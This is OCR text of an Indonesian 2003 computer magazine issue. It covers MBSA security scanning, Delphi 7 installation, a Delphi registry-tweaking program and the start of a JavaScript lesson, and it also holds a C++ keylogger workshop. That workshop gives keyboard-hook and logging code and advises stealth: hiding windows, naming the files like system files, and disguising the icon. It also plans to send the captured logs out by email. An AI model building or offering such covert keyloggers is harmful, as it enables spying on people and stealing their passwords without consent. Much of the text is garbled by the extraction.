Kali ini penulis mengulas alat bantu/tool untuk penggunaOS dari Microsoft. Alat bantu ini dibuat oleh Microsoftuntuk memudahkan pemeriksaan keamanan dari OS kom-puter dan Server yang digunakan. Keistimewaaan alatbantu/tool ini, terutama untuk Administrator Jaringan,adalah bisa memeriksa keamanan/security seluruh kom-puter dalam jaringan secara otomatis dari satu komputer.

Sayangnya, aplikasi ini hanya bisa di-install di mesin OSWindows 2000 (Professional/Server/Advanced) dan Win-

dows XP (Home/Professional). Kabar baik untuk Admin-istrator Jaringan, MBSA bisa memeriksa keamanan mesindengan OS Windows NT 4.0 (Workstation dan Server),walaupun tidak dapat di-install di OS tersebut.

Alat bantu aini dalah suatu aplikasi bernama MicrosoftBaseline Security Analyzer (MBSA) versi 1.1. Anda bisadapatkan dalam CD NeoTek bulan ini atau download dihttp://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/tools/Tools/mbsahome.asp

Instalasi file MBSA menggunakan format MicrosoftInstaller yang sudah ada di Windows 2000/Windows XP.Jika ingin untuk mendapatkan Microsoft Installer versiterbaru/2.0 (untuk Windows 2000 saja, karena WindowsXP sudah menggunakan versi terbaru), ada di CD Neotekatau download di http://www.microsoft.com/downloads/release.asp?releaseid=32832&area=top&ordinal=43

1. Install MBSA dengan double click file MBSASETUP.MSIdan ikuti petunjuk yang diberikan sampai selesai.

2. MBSA otomatis dijalankan setelah proses instalasi se-lesai. Kalau tidak, bisa dijalankan lewat menu Start > AllPrograms > Microsof t Baseline Security Analyzer (WindowsXP) atau Start > Programs > Microsoft Baseline SecurityAnalyzer (Windows 2000). Klik Scan a computer untukmemulai pemeriksaan satu komputer.

3. Untuk memulai scan, an-da harus konek ke Internetdahulu.MBSA membutuh-kan file MSSECURE.CAB(190KB) yang otomatis di-download dari situs Micro-soft. Dalam file ini terdapatfile MSSECURE.XML, yai-tu informasi-informasi ter-kini dari patch yang tersediadi situs Microsoft. Jika su-dah terkoneksi ke Internet,pilih Start scan untuk me-mulai scanning.

4. Setelah scanning selesai,koneksi Internet dapat diputus.Ter-lihat beberapa catatan mengenai keamanan komputer.Ada 21Security Updates yang tidak di-install di komputer contoh.

MMS Baseline Security Analyzer S Baseline Security Analyzer  Vulnerabilities pada Windows secara berkala selalu diatasi dengan patch yang selalu diterbitkan olehMicrosoft. Hanya banyaknya patch dan kesibukan sehari-hari membuat para admin sering kali lalaimeng-update-nya. Albert Siagian ([email protected]) memperkenalkan MBSA untuk mengatasinya.

S

WWIINNDDOOWWS SS SEECCUURRIITTYY

Page 28: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 28/50

NeoTekno

Mei/Jun 2003 NeoTek 27

5. Informasi lebih jelas, anda bisa klik di What was scanneddan Result Detail. Setelah klik Result Detail di layar sebelum-nya, akan muncul daftar Updates/Patches yang tidak ada dikomputer ini. Klik yang diberikan untuk melihat informasilebih lanjut, serta men-download dan install patches tersebut.

6. Selain Updates/Patches untuk Operating System,MBSA juga mencek keamanan lainnya, misalnya, apakah sudah meng-gunakan partisi NTFS atau masih FAT32, sudah tutup Guest

account atau belum, dsb. Juga ada rekomendasi yang dapatanda lakukan. Hal yang sama berlaku untuk IIS (InternetInformation Services), SQL Server, dan Microsoft Office.

7. MBSA juga memiliki kemampuan untuk men-scan lebihdari satu komputer. Fitur ini berguna,baik untuk pengguna yangmemiliki beberapa komputer atau Administrator Jaringanyang mengatur puluhan atau ratusan Server serta Workstation.Caranya pilih menu Pick multiple computers to scan di bagiankiri MBSA. Masukkan Domain Name dari Network anda, danbiarkan MBSA yang men-scan seluruh komputer dalam satuDomain.Bisa juga scanning berdasarkan IP address range. Mi-salnya,anda ingin men-scan keamanan server saja,workstationtidak perlu.Pilih Start Scan untuk memulai scanning.

8. Hasil scanning bisa dilihat dari layar berikut, dan tentu-kan tindakan anda selanjutnya untuk mengamankan server/workstation. Sangat disarankan untuk men-download daninstall semua patches yang tersedia.

9. Proses yang terdahulu dilakukan via GUI,yang memu-dahkan pengguna biasa. Jika dibutuhkan, aplikasi ini juga bisadijalankan melalui Command Line. Hal ini berguna bagi Ad-ministrator Jaringan jika ingin menjalankan fasilitas ini secaraotomatis melalui Batch File (.BAT/.CMD) Masuk ke DOS,pindah ke folder C:\Program Files\ Microsoft Baseline Secu-rity Analyzer dan jalankan file MBSACLI.EXE dengan para-

meter yang dibutuhkan. Untuk melihat parameter-parameteryang tersedia, ketik MBSACLI /? Layar berikut memberikancontoh parameter yang digunakan untuk men-scan 2 komputer.

10. Hasil scanning dibawah ini menunjukkan ada dua kompu-ter yang harus di periksa lebih lanjut, dan install Patches jikadiperlukan. Dengan sedikit kreativitas, buat batch file agarscanning ini dilakukan secara berkala.Hasil scanning dapatdiarahkan dalam bentuk file teks untuk anda review.

Catatan: Untuk menjalankan MBSA,anda tidak harus mela-kukan koneksi ke Internet dahulu, karena file MSSECURE.XMLtetap bisa digunakan berulang-ulang. Perhatikan bahwa Mic-rosoft secara berkala melakukan revisi file MSSECURE.CAB(MSSECURE.XML). Oleh sebab itu, disarankan agar anda juga meng-update file ini secara berkala,misalnya setiap ming-gu. Caranya updatenya mudah, cukup melakukan koneksi ke

Internet, sebelum menjalankan MBSA dan melakukan prosesscanning.MBSA akan otomatis mendownload MSSECURE.CABterbaru, jika ada.

Page 29: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 29/50

NeoTutor

28 NeoTek Mei/Jun 2003

6 LICENSE DAN INSTALATION INFOAnda akan mendapatkan jendelaLicense agreement yang perlu andasetujui dan klik Next untuk menda-patkan jendela Important InstallationInformation. Setelah dibaca, klik Next untuk melanjutkan.

EBAGAI PENGANTAR UNTUK ARTIKEL

selanjutnya, yaitu proyek membuatsendiri tweaking tool dengan Delphi,

berikut ini NeoTek menyajikan cara instal-asi dan pengenalan dasar file-file Delphi;khusus untuk anda yang sama sekali belumpernah mengenal penmrograman.

Pada CD NeoTek ini juga terdapat Delphi

7 Personal Edition (full version) yang se-rial number, authorization key, dan activa-tion code dapat diminta gratis melalui situsBorland.

Langkah-langkah mendapatkan itu semuaserta instalasinya dibahas khusus, untukmemastikan bahwa anda dapat menjalan-kan Borland Delphi 7 Personal Editionpada komputer anda.

BBOORRLLANAND DD DEELPLPHHI 7I 7

PPEERRSSOONAL ENAL EDDIITTIIOONN

FFUULL VLL VEERRSSIIOONNBorland Delphi adalah salah satu programming tool yangpowerful namun juga mudah digunakan. Delphi dapatdikatakan versi grafis dari Pascal sehingga diberi julukanVisual Pascal. Instalasi Borland Delphi adalah awal dariartikel-artikel pemrograman dalam Delphi di NeoTek.

S

INSTAL DELPHI 7 PERSONAL CDDouble click icon setup.exe disubdirektori Delphi7Pers\Installdan instalasi akan dimulai dananda menerima jendela selamatdatang ke Installation Wizard. Klik Next untuk melanjutkan.

ISIKAN S/N DAN AUTH. KEY Isikan serial number dan authori-zation key yang anda dapatkanlewat email sebelumnya. Klik Nextuntuk melanjutkan. Di sini S/N-nya 6F3R-BS5YB8-G3SM3Z-EFDQdan authorization key MV7-PX?

 Yang anda dapatkan mungkinberbeda.

4 5

 Membahas cara instalasi Borland Delphi 7 Personal Edition

INSTALASI SELESAI

Setelah selesai akan tampil jen-dela Installation Wizard Completed.Klik Finish dan instalasi punselesai. Dari Start > Program >Borland Delphi 7 anda bisa pilihDelphi 7 untuk menjalankannya.

10

Page 30: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 30/50

NeoTutor

Mei/Jun 2003 NeoTek 29

OPSI INSTALASIUntuk keperluan belajar, pilih sajatipe instalasi Typical dan klik Nextuntuk melanjutkan. Anda dimintamemilih tipe Microsoft Office apa

 yang terinstal di komputer anda.klik Next untuk melanjutkan.

DESTINATION FOLDER Secara default Delphi 7 akan diinstaldi C:\Program Files\Borland\Delphi7\ (program file) dan shared files-nyadi C:\Program Files\CommonFiles\Borland Shared\ Untuk uninstall kelak anda perlumembentuk installation database.

7 8

MEMULAI DELPHI 7

Begitu dijalankan secara otomatisDelphi akan membuka Project 1

 yang terdiri atas komponen-kom-ponen Unit1.pas (untuk source codeDelphi) dan Form1 untuk memu-

dahkan kita membentuk graphicalinterface yang akan secara oto-matis ter-coding dalam Unit1.pas.

Selain itu secara otomatis dibuka juga Object TreeView dan ObjectInspector yang memudahkan kitamerancang karakteristik setiapobyek pada interface yang kitabuat serta merupakan wizarduntuk penempatan kode-kodepemrograman.

Apabila tertutup dapat ditampil-kan lagi lewat menu View. Jugaantara Unit dengan Form dapat di-toggle.

Keseluruhan ini adalah suatu

project (di-save sebagai *.dpr )sedangkan source code sebagai*.pas dan form sebagai *.dfm

11

MULAI DARI AWAL

Untuk mulai dari awal sekali, darimenu anda dapat memilih File >New > Application (untuk mem-buat proyek baru) atau File >Open (untuk membuka proyek 

 yang sudah ada). Anda akan

mendapat pesan apakah perlumen-save proyek yang terbukasebelumnya

12

INSTALASI BERJALANSelanjutnya akan tampil jendelaReady to Install the Program. Klik Next dan instalasi berjalan secaraotomatis sampai selesai.

9

MEMBUKA PTWEAKID.DPR 

Pada CD NeoTek terdapat proyek tweaking tool dengan Delphi. Bukaproyek dengan nama PTweakid.dpr

 yang komponennya (akan ter-loadbersamaan) adalah UTweakid.pas(source code file) dan interface

(form file) yaitu UTweakid.dfm. Yang dibuka hanya file *.dpr saja.

13

3COPY REG119.TXT

Copy reg119.txt ke direktori berikut:Win98 (single user) C:\WindowsWin98 (multiuser)C:\Windows\Profiles\<username>W2K/XP C:\Documents andSettings\<username> agar di-loadsecara otomatis setiap kali Delphi 7dijalankan.

KUNJUNGI SITUS BORLAND

Untuk menginstal Delphi 7 PersonalEdition yang di CD NeoTek, kunjungihttp://info.borland.com/new/d7/personal.html. Setelah mengisi form dankuesioner, anda diminta memveri-fikasi email sebab serial number,authorization key, dan activation keyfile akan dikirim via email.

EMAIL DARI BORLAND

Anda segera menerima email yangberisi serial number dan authoriza-tion key. Adapun activation key ( reg119.txt ) ada di attachment mau-pun di-paste di badan email. Bilatidak ada attachment, save email inisebagai file reg119.txt.

1 2

Page 31: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 31/50

NeoTutor

30 NeoTek Mei/Jun 2003

EMBACA TENTUNYA SUDAH TERBIASA DENGAN PROGRAM-program tweaking, seperti WinBoost, WinHacker,Tweak UI, Tweak Me, dan mungkin juga telah ada

yang menggunakan program CaroX yang merupakan pro-gram tweaking lokal. Workshop Delphi kali ini mengete-ngahkan cara membuat program tweaking. Kita beri namasaja Tweakid. Program ini hanyalah contoh apresiasi pe-mrograman Delphi untuk memanipulasi registry Windows,yang nantinya dapat anda kembangkan lebih jauh.

Membuat program tweaking ini selain membutuhkan ke-mampuan pemrograman Delphi juga membutuhkan penge-tahuan mengenai registry Windows. Terutama pembacaharus mengetahui bagian-bagian registry yang perlu di-ubah. Untungnya majalah NeoTek telah banyak memuatbahasan tentang mengutak-utik registry. Anda dapatmembuka arsip Neotek di situs http://www.neotek.co.id.sehingga anda dapat menggunakannya sebagai referensidalam mengubah registry.

Tweaking Registry Secara Manual

Pada dasarnya manipulasi registry Windows dapat dilaku-kan secara manual, yaitu dengan menggunakan tool ba-waan dari Windows yaitu regedit. Hanya saja bila anda

membuat programnya maka manipulasi registry akanlebih mudah.

Dalam workshop ini bagian-bagian registry yang akandiubah adalah seperti diperlihatkan pada Tabel 1. Inihanyalah contoh saja. Penulis bawakan empat macamdword value dan dua macam string value. Bila andamenguasai cara pengubahan kedua value tersebut makapembaca telah dapat membuat program tweaking, karenaprogram-program tweaking yang ada seperti disebutkandi atas kebanyakan hanya mengubah kedua macam valuetersebut, yaitu dword value dan string value.

Membuat Program TweakingMula-mula yang harus anda lakukan adalah merancangantarmuka/interface program terlebih dahulu.Letakkankomponen-komponen berikut: 7 komponen BitBtn daripallete Additional, 6CheckBox dari palleteStandard,dan satu kom-ponen Edit dari palleteStandard,ke bidangForm1 yang masih ko-song. Aturlah letakkomponen tersebutseperti pada Gambar 1

Delphi TDelphi Tweaking Tweaking TooloolHappy Chandraleka ([email protected]) membahas dua hal sekaligus, tweaking danDelphi programming workshop. Walaupun belum pernah mengenal programming sama sekali,

anda tetap dapat mengikuti bahasan langkah per langkah ini.

P

DDEELPLPHHI WI WOORRKSKSHHOOPP

Gambar 1. Pembentukan interface untuk program

Tweakid.

Pilih tab Additional dan klik icon kedua(BitBtn), yaitu memilih tombol (button)untuk ditempatkan pada Form1 yang

 masih kosong.

 Setelah meng-klik icondi atas, geser mouse ke arah bidang

 kosong Form1 dan klik di tepat ini. Kalau perlu button yang terbentuk dapat digeser 

 ke tempat yang diinginkan.

Perhatikan, bersamaan dengan selesainya interface yang dibentuk pada bidang Form1, coding telah terbentuk pada Unit1.pas

 Setelah selesai menempatkan beberapa BitBtn, pilih tab Standard dan pilih icon ke-9 (checkbox) dan

 pindahkan mouse ke bidang kosong Form1 dan klik untuk

 menempatkannya.

Page 32: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 32/50

NeoTutor

Mei/Jun 2003 NeoTek 31

Selanjutnya anda perlu menyesuaikan properti masing-masing komponen program Tweakid. Ubah propertikomponennya berdasarkan Tabel 2. Contoh penyesuaiproperti tampak pada Gambar 2

Pada penyesuaian properties BitBtn dan Checkbox, begituopsi dipilih langsung terlihat perubahan interface (Gam-bar 2b).

Bila anda telah selesai mengubah properti seluruh kom-ponen yang ada berarti pembaca telah selesai merancanginterface program Tweakid. Langkah berikutnya adalahmenambahkan kode-kode program.

Penambahan Kode Program

Inilah bagian sesungguhnya dalam pemrograman Delphiyang menuntut pemahaman yang mendalam tentang

bahasa Delphi. Di sini penulis akan menuntun pembacauntuk melakukannya setahap demi setahap sehinggapemrograman yang tadinya sulit menjadi mudah bagipembaca.

Gambar 2. Penyesuaian properti pada FTweakid dan BitBtn1 dilakukandengan mengklik Oject pada Object TreeView dan mermilih tab

Properties pafda Object Inspector. Pilih properties yang ingin disesuaikandi sini dan ketikkan sesuai petunjuk pada Tabel 2.

Tabel 1.

Key Value Fungsi

Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value GeneralTab Mengontrol visibility tab General Internet Options

Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value SecurityTab Mengontrol visibility tab Security Internet Options

Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value PrivacyTab Mengontrol visibility tab Privacy Internet Options

Hkcu\Software\Policies\Microsoft\Internet Explorer\Control Panel Dword value ContentTab Mengontrol visibility tab Content Internet Options

Hkcu\Software\Microsoft\Internet Explorer\Toolbar String value BackBitmap Mengganti latar belakang browser IE

Hkcu\Software\Microsoft\Internet Explorer\Main String value Window Title Mengganti window title browser I E

Tabel 2.

Komponen Properti Nilai

Form1 Caption Tweakid

Name FTweakid

BitBtn1 sampai 6 Kind bkOK

BitBtn7 Kind bkClose

CheckBox1 Caption Hilangkan General tabCheckBox2 Caption Hilangkan Security tab

CheckBox3 Caption Hilangkan Privacy tab

CheckBox4 Caption Hilangkan Content tab

CheckBox5 Caption Hilangkan Go button

CheckBox6 Caption Ganti kulit browser IE

Edit1 Text C:\Windows\Setup.bmp

Page 33: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 33/50

Masuklah ke jendela code editor(Unit1.pas) yang memuat source codeprogram Tweakid. Bila jendela ini ter-tutup oleh yang lain, tampilkan denganmemilih View > Toggle Form/Unitatau dapat juga tekan tombol F12(Gambar 3).

Tambahkan uses Registry pada bagian

uses, sehingga bagian uses secara leng-kap menjadi sebagai berikut:.

uses

Registry, Windows, Messages, SysUtils,Variants, Classes, Graphics, Controls,Forms,Dialogs, StdCtrls, Buttons;

yang tampak pada Gambar 4.

Tambahkan juga pada bagian variabelkode berikut ini.

var

FTweakid : TFTweakid;Reg : TRegistry;

Komponen ProgranMasih pada Unit1.pas, kita akan mulaimenuliskan komponen-komponenprogram Tweakid.

Double click pada komponen BitBtn1,sehingga anda dibawa ke bagian padaUnit1.pas tempat kita menempatkansyntax untuk di antara tanda begin danend;. tepatnya ndi antaraprocedure TFTweakid.BitBtn1Click(Sender: TObject);begin

end;

Adapun syntax yang disisipkan diantara begin dan end; itu adalah:Reg := TRegistry.Create;

Reg.RootKey := Hkey_Current_User;

Reg.OpenKey('\Software\Policies\Microsoft\InternetExplorer\Control Panel', false);

if CheckBox1.Checked = true then Reg.WriteBool('GeneralTab', true)

else reg.WriteBool ('GeneralTab', false);

Reg.Free

NeoTutor

32 NeoTek Mei/Jun 2003

Gambar 3 dan 4. Pada agian header Unit1.pas cari bagian uses dan ganti isinya.

Gambar 5 dan 6. Double click pada BitBtn1 dananda akan dibawa ke bagian pada source code program (padaUnit1.pas) untuk menempatkan

 syntax bagi fungsi yang dihubungkan ke BitBtn1tersebut.

Page 34: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 34/50

Lakukan dengan cara yang sama untuk komponen BitBtn2,dan lengkapi dengan kode berikut ini:Reg := TRegistry.Create;Reg.RootKey := Hkey_Current_User;Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false);if CheckBox2.Checked = true then Reg.WriteBool ('SecurityTab', true)

else reg.WriteBool ('SecurityTab', false);Reg.Free;

Untuk BitBtn3, lengkapi dengan sintaks berikut ini :Reg := TRegistry.Create;Reg.RootKey := Hkey_Current_User;Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false);if CheckBox3.Checked = true then Reg.WriteBool ('PrivacyTab', true)

else reg.WriteBool ('PrivacyTab', false);Reg.Free;

Untuk BitBtn4, tambahkan sintaks di bawah ini :Reg := TRegistry.Create;Reg.RootKey := Hkey_Current_User;Reg.OpenKey('\Software\Policies\Microsoft\Internet Explorer\Control Panel', false);if CheckBox4.Checked = true then Reg.WriteBool ('ContentTab', true)

else reg.WriteBool ('ContentTab', false);Reg.Free;

Sedangkan untuk BitBtn5, sintaks yang ditambahkan adalahReg := TRegistry.Create;Reg.RootKey := Hkey_Current_User;Reg.OpenKey('\Software\Microsoft\Internet Explorer\Main', false);if CheckBox5.Checked = true then Reg.WriteString('ShowGoButton', 'no')

else Reg.WriteString ('ShowGoButton','yes');Reg.Free;

Terakhir, untuk BitBtn6 tambahkan sintaks seperti di bawah iniReg := TRegistry.Create;Reg.RootKey := Hkey_Current_User;Reg.OpenKey('\Software\Microsoft\Internet Explorer\Toolbar', false);if CheckBox6.Checked = true then Reg.WriteString('BackBitmap', Edit1.Text)

else Reg.WriteString ('BackBitmap','');Reg.Free;

Sampai di sini anda dapat langsung meng-compile programanda menghasilkan file .exe. Compile project yang sedangpembaca kerjakan ini dengan memilih menu Run > Run atau

dengan menekankey F9. Sekaranganda telah mem-punyai programtweaking toolsendiri yang da-pat digunakanuntuk mengubah

setting-settingInternet.

Selanjutnya sim-pan denganmemilih menuFile > Save All.

Demikianlahworkshop pe-mrogramanDelphi ini,membuat pro-gram tweaking.Ini semua ha-nyalah apresiasipemrogramanDelphi untukmemanipulasiregistry. Bilapembaca dapatmembuat pro-gramTweakid initentunya pem-baca dapat pulamengembang-kannya dan me-lengkapi dengantweaking registry yang lain,yang pentingpembaca mengetahui bagian registry Windows yang perludiubah.

Happy programming ….

NeoTutor

Mei/Jun 2003 NeoTek 33

Gambar 7. Tekan F9 atau dari menu Run > Run untuk meng-compile project ini menjadi program dengan nama PTweakid.exe

Gambar 8. Hasil kompilasi adalah

file executable Ptweakid.exe

Page 35: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 35/50

NeoTutor

34 NeoTek Mei/Jun 2003

Membuat Sendiri KMembuat Sendiri Keyloggereylogger

ada dasarnya, Keylogger adalah sebuah programuntuk mencatat setiap aktifitas keyboard. Padaperkembangannya, Keylogger yang canggih bisa

melakukan pencatatan secara selektif, menyimpannya kefile dan kemudian secara periodik mengirimkannya kesebuah alamat email. Tulisan ini hanya membahas prinsip

dasar Keylogger dalam melakukan intersepsi(interception) pesan-pesan aktivitas keyboard di suatukomputer berbasis Windows.

Model IntersepsiSecara garis besar, ada dua cara dalam melakukanintersepsi:

• intersepsi di satu proses yang sama• intersepsi secara sistem (pada proses yang berlainan)

Yang umum dipakai adalah model intersepsi yang kedua,yaitu mengaktifkan suatu proses (software) tertentuuntuk melakukan intersepsi pesan keyboard proses-proseslain yang sedang aktif.

Intersepsi Secara SistemProses intersepsi ini sebenarnya sangat sederhana. Setelahsoftware kita instal, maka ia akan berfungsi sebagai Inter-septor, seperti yang digambarkan di diagram di bawah ini.

Setiap pengiriman pesan aktivitas keyboard oleh Proses Xke sistem, akan dicegat terlebih dahulu oleh proses kita.Selanjutnya pesan keyboard ini diteruskan apa adanya(agar tidak menimbulkan kecurigaan) ke sistem, yangkemudian akan mengirimkan respons ke Proses X.

Pada model ini, fungsi interseptor diletakkan di satu objek

yang shareable pada tingkat sistem. Pada tulisan ini,penulis menggunakan DLL untuk melakukan intersepsi.

Yang harus diperhatikan, sifat DLL adalah self-containeddan shared.

Pada beberapa program keylogger yang beredar diInternet, proses inisialisasi dan pencatatan ke output file(misalnya ke c:\keylog.txt) dilakukan oleh DLL, sehinggaagak menyulitkan pengguna ketika hendak

mengubah/mengganti file output.Pada tulisan ini, DLL hanya akan difungsikan sebagaipemicu, sedangkan proses inisialisasi dan pencatatandilakukan oleh program utama, dalam bentuk exe.

Strategi PemrogramanPenulis menggunakan bahasa C++ dan compiler VC6.0.Agar file DLL dan EXE yang dihasilkan berukuran kecil,sebaiknya hindari MFC dan gunakan Win32 API. Janganmunculkan (show) Window apapun agar ikon tidakmuncul di status bar (semi stealth). OS yang digunakanadalah Win2k.

Transfer Pesan DLL-EXEKetika sebuah tombol keyboard ditekan, DLL interseptorakan mengirimkan pesan ke proses utama menggunakanperintah

PostMessage(hwnd,5000,wParam,lParam).

hwnd adalah handel Window proses utama, 5000 adalahID pesan yang didefinisikan di program utama.

Pemrograman DLL InterseptorPemrograman DLL dilakukan sesuai standar, sbb:

• gunakan __declspec(dllexport) untuk setiap fungsi yangdiekspor.

• gunakan #pragma data_seg() dan #pragmacomment(linker, "/section:.DEWAN,rws") untuk mem-buat sharing variables section.

• letakkan semua variabel 'global' di bagian tersebut,yaitu handel Window utama dan handel hook.

Untuk melakukan intersepsi, penulis menggunakan satu

Dewanata ([email protected]) membahas cara kerja keylogger dan menyajikanprogramming tip untuk membuat keylogger sendiri, lengkap dengan strategi penulisan

program serta tip-tip penulisdan syntax-nya. Bahasa yang digunakanadalah C++ dengan Visual C 6.0 Compiler.

P

C++ WC++ Workshoporkshop

Proses X

Proses X

PesanKeyboard

PesanKeyboard

Interseptor  Sistem

intersep pesankeyboard

• terjemahkanpesankeyboard

• tulis ke file

DLL Interceptor 

1. pesan masuk 2. pesan masuk

4. lanjutkan pesan ke sistem

3. kembalikan proses

EXE Program Utama

Page 36: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 36/50

NeoTutor

Mei/Jun 2003 NeoTek 35

perintah yang disediakan oleh Win32 API yaituSetWindowsHookEx, dalam baris sbb:

hhook = SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc, hInst, (DWORD)NULL);

untuk:

hhook: handel hook iniWH_KEYBOARD: intersepsi dilakukan untuk setiap

aktivitas keyboardKeyboardProc: fungsi yang akan meng-handle prosessetelah intersepsi dilakukan

Selanjutnya yang harus diingat adalah anda harusmemanggil fungsiCallNextHookEx(hhook,code,wParam,lParam) di akhirfungsi KeyboardProc.

Pemrograman EXE Program UtamaPertama-tama DLL dipanggil secara dinamismenggunakan LoadLibrary(). Setelah itu, fungsiSetKeyboardHook dipanggil untuk memulai prosesintersepsi.

Pada rutin pemrosesan pesan, tambahkan beberapa baristambahan untuk melakukan pemeriksaan apakah pesanyang sedang diproses adalah pesan yang dikirimkan olehDLL Interseptor.

Jika ternyata benar ini adalah pesan yang dimaksud, jalankan proses pencatatan, sebagai terlihat pada listing

terakhir.

Proses InstalasiAda dua file yang akan dihasilkan oleh proyek kita:

• srv32.exe, ukuran 24 kb, sebagai program utama• srv32d.dll, ukuran 32 kb, sebagai DLL interseptor

File srv32d.dll sebaiknya diletakkan diC:\WINNT\SYSTEM32, sedangkan file srv32.exe bisadiletakkan di mana saja, tapi sebaiknya letakkan di

C:\WINNT.Cara PemakaianJalankan di C prompt dengan perintah srv32 [output file]

Misal: srv32 c:\capture.txt.

Pembahasan Versi Selanjutnya• Mencegah dua instan aktif di memori

• Menjalankan software secara otomatis ketika startup,menggunakan Registry

• Mengemas dua file di atas ke dalam satu file instalasitunggal (.exe) menggunakan NSIS. Ini dapat mengu-rangi ukuran deployment (reduksi sekitar 50%) dan

mengotomatisasikan proses instalasi. Ikon program ini juga bisa dirubah ke ikon yang familiar bagi parapengguna, misalnya: ikon Macromedia Flash.

• Mencatat proses (software) yang sedang aktif ketikakeyboard ditekan.

• Melakukan pencatatan selektif, yang hanya mencatatproses keyboard pada satu aplikasi tertentu (misal:pengetikan dalam Excel, Internet Explorer, atau Wordsaja).

• Pengiriman file output ke alamat email

dllhinst=LoadLibrary("srv32d"); \\ nama file DLL adalah srv32d.dllif (dllhinst!=NULL){

f = (void(*)(HWND)) GetProcAddress(dllhinst, "SetKeyboardHook");if(!f){

FreeLibrary(dllhinst);error=TRUE;

}else

{(*f)(hwnd);

}

LRESULT CALLBACK WindowFunc(HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam){

switch(message){case WM_DESTROY:

PostQuitMessage(0);

break;case UWM_KEYCAPTURED:// ID tambahan, predefined, = 5000OnKeyCaptured(wParam,lParam);break;

default:return DefWindowProc(hwnd,message,wParam,lParam);

}return 0;

}

LRESULT OnKeyCaptured(WPARAM wParam, LPARAM lParam){char ch;

if(bRightClass){if((wParam==VK_SPACE)||

(wParam==VK_RETURN)||(wParam==VK_DELETE)||(wParam==VK_SHIFT)||((wParam>=0x2f)&&(wParam<=0x100))){

stream=fopen(m_szFilename,"a+");if(wParam==VK_RETURN){

ch='\n';fwrite(&ch,1,1,stream);

} elseif(wParam==VK_DELETE){

char cd[] = "<d>";fwrite(&cd,3,1,stream);

} else

if(wParam==VK_SHIFT){char cd[] = "<s>";fwrite(&cd,3,1,stream);

} else {BYTE ks[256];GetKeyboardState(ks);

 WORD w;UINT scan=0;ToAscii(wParam,scan,ks,&w,0);ch = char(w);fwrite(&ch,1,1,stream);

}fclose(stream);

}}

return 0;}

Page 37: Neotek Vol. III - No. 08

8/9/2019 Neotek Vol. III - No. 08

http://slidepdf.com/reader/full/neotek-vol-iii-no-08 37/50

NeoTutor

36 NeoTek Mei/Jun 2003

ada bagian sebelumnya kita te-lah mendefinisikan parameter-parameter dan argument-argu-

ment dari objek buatan sendiri. Kali inikita akan melangkah pada bagian ter-akhir dari pembahasan objek buatansendiri. Kita akan mempelajari propertibawaan dari tiap objek, yaitu propertiprototype dan properti bawaan dari tiapinstan objek yaitu properti constructor.

Selanjutnya pada bagian akhir kita akanmengenal secara sekilas objek Library.

Properti PrototypeSetiap objek yang kita buat dengan kon-struktor, secara otomatis akan memilikisebuah properti khusus yang dinama-kan dengan properti prototype. Propertiini digunakan untuk menambahkanproperti-properti atau metode-metodebaru ke semua instan dari suatu objek,baik yang telah kita definisikan mau-pun yang belum kita definisikan. Sin-aksnya sebagai berikut:

Jika Anda masih belum paham, baiklahkita akan coba dengan contoh berikutini. Pertama-tama kita akan medefini-ikan sebuah konstruktor objek yangsederhana.Misalkan kita akan membuatobjek Kendaraan. Perhatikan konstruk-tornya berikut:

Dengan konstruktor tersebut kita men-definisikan objek dengan satu propertiyaitu jenis yang nilainya tergantungdari argument parameter masukan.Sekarang kita buat instan untuk objek,misal instan Mobil, berikut sintaksnya:

Statement di atas akan membuat sebu-

ah instan objek Kijang dengan nilaiproperti jenis "darat". Sehingga jika

kita akan tampilkan nilai propertinyaakan tercetak "darat."

Outputnya:

Sekarang kita akan menambahkan se-buah properti baru untuk objek Kenda-raan, yaitu properti roda. Maka dengan

menggunakan properti prototype. Cara-nya seperti berikut:

Dengan statement tersebut artinya kitamenambahkan sebuah properti roda keobjek dengan nilai 4. Jika masih ragukita dapat menampilkannnya.

Outputnya:

Kita coba dengan membuat sebuahinstan baru untuk objek Kendaraan.Misalnya kita buat instan Motor.

Secara otomatis instan ini juga akan me-miliki properti roda,sebagaimana instanlainnya dari objek Kendaraan, meskipuninstan ini didefinisikan setelah penam-bahan dilakukan.Masih ragu? Cetak saja!

Outputnya:

Perhatikan bahwa nilai properti rodauntuk setiap instan adalah sama dan kitadapat memanipulasikannya kemudian.Kesimpulannya properti prototype iniakan sangat berguna bagi kita jika padasuatu saat kita ingin menambahkan se-buah properti atau metode baru ke objek,tentu saja jika nilai dari properti tersebutsama untuk semua instan.Tapi jika ter-nyata nilainya tidak sama, maka kitaharus memanipulasinya kemudian.

Sekarang perhatikan bagaimana yang

terjadi jika ternyata sebuah propertiyang akan ditambahkan sudah terdapat

dalam konstruktor? Masih denganmenggunakan contoh di atas. Kitamisalkan akan menambahkan properti jenis ke objek, padahal properti ini,sebagaimana yang Anda lihat telahterdefinisi dalam konstruktor. Apayang akan terjadi? Kita coba saja!

Tampilkan dua properti jenis dari instan

